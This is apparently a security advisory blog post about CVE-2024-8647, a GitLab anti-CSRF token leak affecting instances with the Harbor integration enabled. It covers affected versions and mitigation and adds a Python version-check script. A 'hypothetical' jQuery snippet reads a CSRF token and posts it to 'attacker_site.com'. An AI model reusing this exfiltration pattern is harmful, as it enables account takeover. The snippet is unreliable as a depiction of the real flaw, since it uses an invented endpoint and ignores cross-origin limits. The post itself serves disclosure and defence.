A vulnerability, identified as CVE-2024-8647, has been discovered in GitLab that affects versions 15.2 through 17.4.6, version 17.5 before 17.5.4, and version 17.6 before 17.6.2. The issue allows an anti-CSRF token to be leaked to an external website. It only occurs on self-hosted GitLab installs with the Harbor integration feature enabled. This blog post provides an in-depth analysis, a code snippet, and references to help understand the vulnerability and its exploitation.

Vulnerability Details

The vulnerability results from the way GitLab handles interactions between its own code base and the Harbor integration. Specifically, it lies in how GitLab's anti-CSRF token handling behaves when requests are made through the Harbor integration. An attacker can manipulate this interaction so that the anti-CSRF token is leaked to an external website under the attacker's control.

Exploit Details

An attacker can exploit this vulnerability by tricking a user into visiting a malicious webpage while logged into their self-hosted GitLab instance. This malicious site can then initiate a cross-site request to GitLab, exploiting the vulnerability and capturing the victim's anti-CSRF-token. With possession of the user's anti-CSRF token, an attacker can forge requests as the victim, potentially leading to unauthorized data access or modification.

Code Snippet

Below is a hypothetical code snippet illustrating the leakage of the anti-CSRF-token when interacting with an external site:

// Malicious code hosted on external site
$(document).ready(function() {
    // Capture the anti-CSRF token from the GitLab instance
    $.get("https://gitlab_instance.com/user_x/csrf_token", function(data) {
        // Send the captured token to the attacker's site
        $.post("https://attacker_site.com/receive_token", { csrf_token: data.token });
    });
});

This snippet demonstrates how easy it is for an attacker to steal the anti-CSRF token using a simple cross-site request.

Mitigation and Recommendations

To mitigate this issue, it is recommended that users update their GitLab installations to version 17.5.4 or 17.6.2, which have already addressed this vulnerability. If updating GitLab is not an option, users can choose to disable the Harbor integration until a patch can be installed.
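As an added example (not code from the original post or from GitLab), the following Python check classifies a GitLab version string against the affected ranges stated in this post, so an administrator can confirm whether an instance still needs the upgrade. It assumes that 17.4.6, 17.5.4 and 17.6.2 are the first fixed releases on their branches, since the advisory links below name them as patch releases, and that each branch's lower bound is its x.y.0 release; the `/api/v4/version` response it parses is a constructed sample.

```python
"""Check a GitLab version against the CVE-2024-8647 affected ranges."""
import json
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# (first affected, first fixed) per branch; the upper bound is exclusive.
# Assumption: 17.4.6, 17.5.4 and 17.6.2 are the patch releases named in the
# advisory links, and x.y.0 is the first release of each affected branch.
AFFECTED_RANGES = [
    ((15, 2, 0), (17, 4, 6)),
    ((17, 5, 0), (17, 5, 4)),
    ((17, 6, 0), (17, 6, 2)),
]


def parse_version(text: str) -> Optional[Version]:
    """Parse '17.5.3', 'v17.5.3-ee' or '17.5' into (major, minor, patch)."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(version: str, harbor_enabled: bool = True) -> bool:
    """True when the version is in an affected range and Harbor is enabled."""
    parsed = parse_version(version)
    if parsed is None:
        raise ValueError(f"unrecognised GitLab version: {version!r}")
    if not harbor_enabled:
        return False  # the leak only applies with the Harbor integration on
    return any(lo <= parsed < hi for lo, hi in AFFECTED_RANGES)


def assess_version_endpoint(body: str, harbor_enabled: bool = True) -> str:
    """Assess the JSON body returned by GitLab's /api/v4/version endpoint."""
    version = json.loads(body)["version"]
    if is_affected(version, harbor_enabled):
        return f"{version}: affected by CVE-2024-8647 - upgrade or disable Harbor"
    return f"{version}: not affected"


if __name__ == "__main__":
    # Constructed sample response shaped like the real endpoint's output.
    sample = '{"version": "17.5.3-ee", "revision": "abcdef0"}'
    print(assess_version_endpoint(sample))
```

Run it against the live `/api/v4/version` output of your own instance (the endpoint requires an authenticated token) and pass `harbor_enabled` according to the instance's integration settings.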

More information and advisories can be found in the GitLab security release notes:

* GitLab 17.6.2 release notes
* GitLab 17.5.4 release notes
* GitLab Patch Release: 17.4.6

Conclusion

In conclusion, CVE-2024-8647 is a vulnerability that can lead to the leakage of anti-CSRF tokens in GitLab instances running versions 15.2 through 17.4.6, 17.5 before 17.5.4, and 17.6 before 17.6.2 with the Harbor integration enabled. Update your GitLab installation or disable Harbor integration to mitigate the risk.

Timeline

Published on: 12/12/2024 12:15:28 UTC